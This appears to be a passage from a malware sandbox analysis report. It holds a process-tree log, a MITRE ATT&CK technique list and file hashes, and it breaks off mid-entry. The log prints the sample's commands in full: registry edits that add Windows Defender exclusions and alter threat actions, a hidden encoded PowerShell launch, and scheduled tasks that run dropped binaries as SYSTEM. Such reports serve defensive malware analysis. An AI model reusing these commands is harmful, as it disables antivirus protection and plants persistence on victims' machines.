"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:9396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:9448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:9508

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:9552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:9572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:9596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:9624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:9652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:9680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10040

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:10100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:8824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:10792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:10824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:32
3⤵
PID:10468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:64
3⤵
PID:10368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:32
3⤵
PID:10936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:64
3⤵
PID:10960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:32
3⤵
PID:10980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:64
3⤵
PID:11004

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "getdCpFCO" /SC once /ST 02:17:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:11044

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "getdCpFCO"
2⤵
PID:11108

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "getdCpFCO"
2⤵
PID:10184

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 06:55:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\zzGITVO.exe\" V8 /site_id 754 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:10380

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "cbBtQoNpOByPPTwrn"
2⤵
PID:152

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7848

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7840

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:9844

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:10160

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:15884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:11164

C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\zzGITVO.exe
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\zzGITVO.exe V8 /site_id 754 /S
1⤵
PID:4784

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"
2⤵
PID:17476

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:11884

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:12100

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:12168

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:12360

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\jDMuOn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F
2⤵
- Creates scheduled task(s)
PID:12368

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\VaSbLFK.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:12716

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qTJPyBJZsADsDDd"
2⤵
PID:13056

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qTJPyBJZsADsDDd"
2⤵
PID:13236

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\cAxcodW.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:13860

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\qUZsulx.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:13680

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\enLZjbE.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:5736

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\VFlsNoM.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:14060

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 12:49:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\JBPXyJzh\TUUyUWT.dll\",#1 /site_id 754" /V1 /F
2⤵
- Creates scheduled task(s)
PID:15548

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "hMZOFgVuABkGdcuhk"
2⤵
PID:15800

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "spuhLdIvPoBx" /SC once /ST 07:39:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\uzFTStEq\terJxSv.exe\" U4 /S"
2⤵
- Creates scheduled task(s)
PID:16144

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "spuhLdIvPoBx"
2⤵
PID:15904

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\JBPXyJzh\TUUyUWT.dll",#1 /site_id 754
1⤵
PID:16064

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\JBPXyJzh\TUUyUWT.dll",#1 /site_id 754
2⤵
PID:16092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"
3⤵
PID:16724

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\uzFTStEq\terJxSv.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\uzFTStEq\terJxSv.exe U4 /S
1⤵
PID:16616

C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"
1⤵
PID:16856

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\C3C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C3C.tmp.exe
1⤵
PID:9012

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Program Files\VideoLAN\VLC\NEWS.txt
1⤵
PID:12820

C:\Users\Admin\AppData\Local\Temp\2061.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2061.tmp.exe
1⤵
PID:13616

C:\Users\Admin\AppData\Local\Temp\3726.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3726.tmp.exe
1⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\4D20.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4D20.tmp.exe
1⤵
PID:15128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 15128 -s 1108
2⤵
- Program crash
PID:15056

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:15592

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:13068

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8640

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:15512

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:16104

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:16808

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:13544

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:16036

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:17340

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7840

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:17748

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:18116

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x418
1⤵
PID:4740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Java\OGMENEMCZI\prolab.exe

MD5
7233b5ee012fa5b15872a17cec85c893

SHA1
1cddbafd69e119ec5ab5c489420d4c74a523157b

SHA256
46a209c1f32c304a878395b6df5b2e306fd6eea0db40f0bab0a6d71eeb6b8628

SHA512
716ff0dfd097e178d1023fe9e65720bc36b94d291811211a57193df7605616db1752dabaf5637a361c9996510242a71fc58d173605e251d733ae6431da9a1b4f

Download Submit
C:\Program Files\Java\OGMENEMCZI\prolab.exe

MD5
7233b5ee012fa5b15872a17cec85c893

SHA1
1cddbafd69e119ec5ab5c489420d4c74a523157b

SHA256
46a209c1f32c304a878395b6df5b2e306fd6eea0db40f0bab0a6d71eeb6b8628

SHA512
716ff0dfd097e178d1023fe9e65720bc36b94d291811211a57193df7605616db1752dabaf5637a361c9996510242a71fc58d173605e251d733ae6431da9a1b4f

Download Submit
C:\ProgramData\freebl3.dll

MD5
ef2834ac4ee7d6724f255beaf527e635

SHA1
5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

SHA256
a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

SHA512
c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

Download Submit
C:\ProgramData\mozglue.dll

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\msvcp140.dll

MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
C:\ProgramData\nss3.dll

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\softokn3.dll

MD5
a2ee53de9167bf0d6c019303b7ca84e5

SHA1
2a3c737fa1157e8483815e98b666408a18c0db42

SHA256
43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

SHA512
45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

Download Submit
C:\ProgramData\vcruntime140.dll

MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe

MD5
4dc8d3bb4054614473b735abbd1502f5

SHA1
51d98bea8006235f38f06036d1c68ed95d886402

SHA256
b54aa0ab78d370a795d62d2fd4da1f064c0b718953e8f2425b78c6eb907e6309

SHA512
4a3467894c0e78315a1410b19db6572e79f1e1efbb39f5c14ed8a55eec99e9fcb0faf3c74131c83e5c723998e2e5104fa40bb4703e5502bb1abe6dceb1ba3796

Download Submit
C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe

MD5
4dc8d3bb4054614473b735abbd1502f5

SHA1
51d98bea8006235f38f06036d1c68ed95d886402

SHA256
b54aa0ab78d370a795d62d2fd4da1f064c0b718953e8f2425b78c6eb907e6309

SHA512
4a3467894c0e78315a1410b19db6572e79f1e1efbb39f5c14ed8a55eec99e9fcb0faf3c74131c83e5c723998e2e5104fa40bb4703e5502bb1abe6dceb1ba3796

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe

MD5
b98db5d27da960e16fc3ede2e0def0ba

SHA1
d2ead240d61e62ebcb7412f7182e2becf2bd16ec

SHA256
e6ae8f56b2476198deb1ac979acb619f92b1f5abdb18e0c265d54a0d6175fe35

SHA512
29eba27d3300992e66b4bd72e149ca4a588d2c29049083aa62802e7e1d18440ecd8ac1707da3d74629ff3e1549fdabaae38b4c5933268172cf3c91d3019e63be

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe

MD5
b98db5d27da960e16fc3ede2e0def0ba

SHA1
d2ead240d61e62ebcb7412f7182e2becf2bd16ec

SHA256
e6ae8f56b2476198deb1ac979acb619f92b1f5abdb18e0c265d54a0d6175fe35

SHA512
29eba27d3300992e66b4bd72e149ca4a588d2c29049083aa62802e7e1d18440ecd8ac1707da3d74629ff3e1549fdabaae38b4c5933268172cf3c91d3019e63be

Download Submit
C:\Users\Admin\AppData\Local\Temp\cc-f0b9c-db4-32e9f-3f9b438b3f1ab\Kenessey.txt

MD5
97384261b8bbf966df16e5ad509922db

SHA1
2fc42d37fee2c81d767e09fb298b70c748940f86

SHA256
9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

SHA512
